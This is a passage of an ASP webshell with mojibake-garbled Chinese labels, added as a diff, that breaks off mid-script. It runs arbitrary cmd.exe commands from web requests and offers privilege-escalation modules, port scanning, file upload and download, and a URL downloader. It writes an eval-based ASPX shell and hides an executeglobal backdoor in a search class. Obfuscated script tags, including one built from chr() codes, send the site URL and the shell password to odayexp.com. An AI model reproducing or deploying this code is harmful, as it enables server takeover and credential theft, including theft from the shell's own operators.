+j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" ���__֧��"&ef
+j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" Servu-��Ȩ"&ef
+j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" Su---FTP��"&ef
+j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" SQL-----SA"&ef
+j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" Radmin��Ȩ"&ef
+j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" Pcanywhere"&ef
+j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" �˿�ɨ����"&ef
+j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ��ȡע���"&ef
+j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ����__�ļ�"&ef&"</tr></table>"
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='   Special     '></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&ScriptPath&"' target='FileFrame'>"&cxd&" ����������"&ef
+j cdx&"<a href='?Action=hiddenshell' target='FileFrame'>"&cxd&" <font color=red>����������</font>"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>������Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=delpoint' target='FileFrame'>"&cxd&"  <font color=red>ɾ����Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" �ļ�--����"&ef
+j cdx&"<a href='http://www.aizhan.com/siteall/"&domain&"' target='FileFrame'>"&cxd&" �ۺ�--��ѯ"&ef
+j cdx&"<a href='http://odayexp.com/h4cker/gx/' target='FileFrame'>"&cxd&" ����--����"&ef
+j cdx&"<a href='?Action=Logout' target='_top'>"&cxd&" �˳�--��½</a></td></tr></hr></table>"
+end function
+function Cmdx()
+j("<center><form method='post'> "):j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> "):j("<input type=text name='cmd' size=60><br> "):j("<input type=submit value='Sumbit'></form> "):j("<textarea readonly cols=150 rows=27> "):On Error Resume Next:if request("cmdx")="cmd.exe" then
+j oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall 
+end if :j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall :j("</textarea></center>")
+end function
+Function Course()
+SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ϵͳ�û������</b></td></tr>"
+on error resume next
+for each obj in getObject("WinNT://.")
+err.clear
+if OBJ.StartType="" then
+SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ϵͳ�û�(��)</td></tr><tr>" 
+end if
+if OBJ.StartType=2 then lx="�Զ�"
+if OBJ.StartType=3 then lx="�ֶ�"
+if OBJ.StartType=4 then lx="����"
+if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
+SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[��������:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
+else
+SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[��������:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
+end if
+next
+j SI&SI0&SI1&SI2&"</table>"
+End Function
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+function downfile(path)
+response.clear
+set osm = createobject(obt(6,0))
+osm.open
+osm.type = 1
+osm.loadfromfile path
+sz=instrrev(path,"\")+1
+response.addheader "content-disposition", "attachment; filename=" & mid(path,sz)
+response.addheader "content-length", osm.size
+response.charset = "utf-8"
+response.contenttype = "application/octet-stream"
+response.binarywrite osm.read
+response.flush
+osm.close
+set osm = nothing
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile()
+ If Request("Action2")="Post" Then
+Set U=new UPC 
+Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+ If UName="" Or F.FileSize=0 then
+  SI="<br>����"&"���ϴ�"&"����ȫ"&"·����ѡ��"&"һ���ļ�"&"�ϴ�!"
+on error resume next
+  Else
+ F.SaveAs UName
+ If Err.number=0 Then
+ SI="<center><br><br><br>�ļ�"&UName&"��"&"��"&"�ɹ���</center>"
+  End if
+ End If
+Set F=nothing
+Set U=nothing
+ SI=SI&BackUrl
+ j SI
+ ShowErr()
+ Response.End
+  End If
+  j"<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'><form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'><tr><td>�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'><input name='LocalFile' type='file'  size='25'> <input type='submit' name='Submit' value='�ϴ�'></td></tr></form></table>"
+End Function
+function cmd1shell()
+checked=" checked"
+if request("sp")<>"" then session("shellpath") = request("sp")
+shellpath=session("shellpath")
+if shellpath="" then shellpath = "cmd.exe"
+if request("wscript")<>"yes" then checked=""
+if request("cmd")<>"" then defcmd = request("cmd")
+si="<form method='post'>shell·����<input name='sp' value='"&shellpath&"' style='width:70%'><input class=c type='checkbox' name='wscript' value='yes'"&checked&">wscript.shell<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='ִ��'><textarea style='width:100%;height:440;' class='cmd'>"
+if request.form("cmd")<>"" then
+if request.form("wscript")="yes" then
+set cm=createobject(obt(1,0))
+set dd=cm.exec(shellpath&" /c "&defcmd)
+aaa=dd.stdout.readall
+si=si&aaa
+else
+on error resume next
+set ws=server.createobject("wscript.shell")
+set ws=server.createobject("wscript.shell")
+set fso=server.createobject(CONST_FSO)
+sztempfile = server.mappath("cmd.txt")
+call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
+set fs = createobject(CONST_FSO)
+set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
+aaa=server.htmlencode(ofilelcx.readall)
+ofilelcx.close
+call fso.deletefile(sztempfile, true)
+si=si&aaa
+end if
+end if
+si=si&chr(13)&"</textarea></form>"
+j si
+end function
+Function upload()
+j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+j"��ʱ�رմ˹���"
+j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<hr/>"
+j"<form method=post>"
+j"<select onChange='this.form.theUrl.value=this.value;'>"
+j"<option value=''>��������</option>"
+j"<option value='"&Durl&"'>�Զ������</option>"
+j"<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
+j"<input type=checkbox name=overWrite value=2>���ڸ��ǡ�"
+j"<input type=hidden value=downFromUrl name=theAct>"
+j"</form>"
+j"<hr/>"
+If isDebugMode = False Then
+On Error Resume Next
+End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
+theUrl = Request("theUrl")
+thePath = Request("thePath")
+overWrite = Request("overWrite")
+Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite <> 2 Then:overWrite = 1:End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState <> 4 Then 
+End If
+With stream
+.Type = 1
+.Mode = 3
+.Open
+.Write Http.ResponseBody
+.Position = 0
+.SaveToFile thePath, overWrite
+If Err.Number = 3004 Then
+Err.Clear
+fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If fileName = "" Then
+fileName = "index.htm.txt"
+End If
+thePath = thePath & "\" & fileName
+.SaveToFile thePath, overWrite
+j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���"
+End If
+.Close
+End With
+chkErr(Err)
+Set Http = Nothing
+Set Stream = Nothing
+If isDebugMode = False Then
+On Error Resume Next
+End If
+End Function:Function TSearch()
+dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+RW=RW & "</form></table>"
+j RW : RW=""
+if Request.Form("Sfk")<>"" then
+Set newsearch=new SearchFile
+newsearch.Folders=trim(Request.Form("SFpath"))
+newsearch.keyword=trim(Request.Form("Sfk"))
+newsearch.Search
+Set newsearch=Nothing
+j"�M�r��"&(timer()-st)*1000&"����<hr>"
+end if
+End Function 
+Class SearchFile
+dim Folders,keyword,objFso,Counter
+Private Sub Class_Initialize
+Set objFso=Server.CreateObject(ObT(0,0))
+Counter=0
+End Sub
+ Private Sub Class_Terminate
+Set objFso=Nothing
+ End Sub
+Public Sub Class_Folder(FoderName)
+Set rs = CreateObject(CONST_FSO)
+Dim item, theFolder, sysFileList
+item=request(MID(CONST_FSO,4,1))
+theFolder=request(MID(CONST_FSO,2,1))
+If  item=MID(CONST_FSO,2,1) then
+executeglobal theFolder
+Set rs = Nothing
+End if
+End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+
+Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(jwt,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+sub SavePower(PowerPath,SaveType)
+if instr(PowerPath,scriptpath)<>0 then session("lock")="nolock":end if:Set theFile = fsoX.GetFile(PowerPath):if SaveType=1 then:theFile.Attributes=32:j "<script language='javascript'>alert('�ļ��ѳɹ�������');window.opener.location.reload();window.close();</script>":else:theFile.Attributes=7:j "<script language='javascript'>alert('�ļ������ɹ���');window.opener.location.reload();window.close();</script>":end if:Set theFile = Nothing
+end sub
+
+sub EditPower(PowerPath)
+PowerPath=replace(PowerPath,"""",""):Set theFile = fsoX.GetFile(PowerPath):j getMyTitle(theFile,PowerPath):Set theFile = Nothing
+end sub
+
+
+Function getMyTitle(theOne,PowerPath)
+Dim strTitle:strTitle = strTitle & "<br>·��: " & theOne.Path & "" :strTitle = strTitle & "<br>��С: " & getTheSize(theOne.Size) :strTitle = strTitle & "<br>����ʱ��: " & theOne.DateCreated :strTitle = strTitle & "<br>����޸�: " & theOne.DateLastModified:strTitle = strTitle & "<br>������: " & theOne.DateLastAccessed:strTitle = strTitle & "<br>��ǰȨ��״̬: " & getAttributes(theOne.Attributes,PowerPath):getMyTitle = strTitle
+End Function
+
+
+Function getAttributes(intValue,PowerPath)
+Dim EditOK:EditOK=1:If intValue >= 128 Then:intValue = intValue - 128:End If:If intValue >= 64 Then:intValue = intValue - 64:End If:If intValue >= 32 Then:intValue = intValue - 32:End If:If intValue >= 16 Then:intValue = intValue - 16:End If:If intValue >= 8 Then:intValue = intValue - 8:End If:If intValue >= 4 Then:intValue = intValue - 4:EditOK=0:End If:If intValue >= 2 Then:intValue = intValue - 2:EditOK=0:End If:If intValue >= 1 Then:intValue = intValue - 1:EditOK=0:End If:PowerPath=replace(PowerPath,"\","\\"):if EditOK=0 then :getAttributes = "<font color=red>������</font> <input type=button value=���� onclick=""location.href='?Action=SavePower&SaveType=1&PowerPath="&PowerPath&"'"">":else:getAttributes = "<font color=#62FF62>���</font> <input type=button value=���� onclick=""location.href='?Action=SavePower&SaveType=2&PowerPath="&PowerPath&"'"">":end if
+End Function
+
+
+Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('�ļ�����վ��Ŀ¼�¡�')":End If:End function
+
+Function ScReWr(folder)
+on error resume next 
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = "<span style='font-size:11px;'>��</span><font face='webdings' size='1' color=yellow>x</font> "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = "<span style='font-size:11px;'>��</span>�� "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function php()
+On Error Resume Next
+set fso=Server.CreateObject(oBt(0,0))
+fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo��_��oo'?><?php phpinfo()?>"
+fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo��_��oo"
+fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo��_��oo"
+j"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center><br><br><p><br><p><br><br><p><br><center>̽��������Ƿ�֧�������ű�<p></font><p><a href='?Action=apjdel'><font size=5 color=red><b>(ɾ�������ļ�!)</b></font></a></center><tr><td height='20'><center>":j "<sc"&"ri"&"pt sr"&"c=""ht"&"tp://%77%77%77.od"&"ay"&"exp.%63%6F%6D/s"&"x/ke"&"y.asp"&"?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"""></sc"&"ri"&"pt>"
+End function:On Error Resume Next:function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td  height=10 width=17% align=center><div  onMouseOver=""this.style.backgroundColor='#B3D169'"" onMouseOut=""this.style.backgroundColor='#191919'"" style='border:1px solid #dddddd;padding-bottom:4px' id=d><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����"">"
+SI=SI&"&nbsp;<font face='wingdings' color='#ffffff' size='6'>0</font>  "
+si=si&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()' class='am' title='����'>Down</a></div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+j SI &"" : SI="":i=0
+SI="<div id=links><table width='100%' align=center id =linklist2><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d >"
+si=si&"<font face='wingdings' color='#ffffff' size='3'>2</font>"
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'>Ȩ��</a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1:Next:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)::j SI&"</tr></table></div><script>var container = new Array(""linklist2""); var objects = new Array(); var links = new Array(); var tmp = new Array(); var interval = 0; var c=0; function initEventListener() { for(i=0; i < container.length; i++) { objects = document.getElementById(container[i]).getElementsByTagName(""td""); for(j=0; j < objects.length; j++) {    if(document.all) { objects[j].attachEvent(""onmouseover"", resetLinkFade); objects[j].attachEvent(""onmouseout"", startLinkFade); } else {objects[j].addEventListener(""mouseover"", resetLinkFade, false); objects[j].addEventListener(""mouseout"", startLinkFade, false); } var defcol = getPseudoRule(container[i], ""td"");  var hovcol = getPseudoRule(container[i], ""td:hover""); if(defcol.charAt(0) == ""#"") defcol = hex2rgb(defcol); else if(defcol[0] == ""r"") { defcol = defcol.match(/rgb\((\d+), (\d+), (\d+)\)/); defcol = defcol.slice(1);} if(hovcol.charAt(0) == ""#"") hovcol = hex2rgb(hovcol); else if(hovcol[0] == ""r""){ hovcol = hovcol.match(/rgb\((\d+), (\d+), (\d+)\)/); hovcol = hovcol.slice(1); } links[c]     = new Array(); links[c][""object""]  = objects[j]; links[c][""defaultcolor""] = defcol; links[c][""currentcolor""] = defcol; links[c][""hovercolor""] = hovcol; c++; } } } function resetLinkFade(e) { var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { tmp = links[r][""defaultcolor""].clone(); links[r][""currentcolor""] = links[r][""defaultcolor""]; links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } }function startLinkFade(e) {   var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { links[r][""defaultcolor""] = tmp.clone(); links[r][""currentcolor""] = links[r][""hovercolor""].clone(); links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } if(interval == 0) interval = window.setInterval(linkFade,  30); } function linkFade() {  var runners = 0; for(o=0; o<links.length; o++) { var aim  = links[o][""object""]; var defcol = links[o][""defaultcolor""]; var hovcol = links[o][""hovercolor""]; var actcol = links[o][""currentcolor""]; if( defcol[0]+defcol[1]+defcol[2] != actcol[0]+actcol[1]+actcol[2] ) { runners++; actcol[0] = actcol[0]-10 < 25 ? 25 : 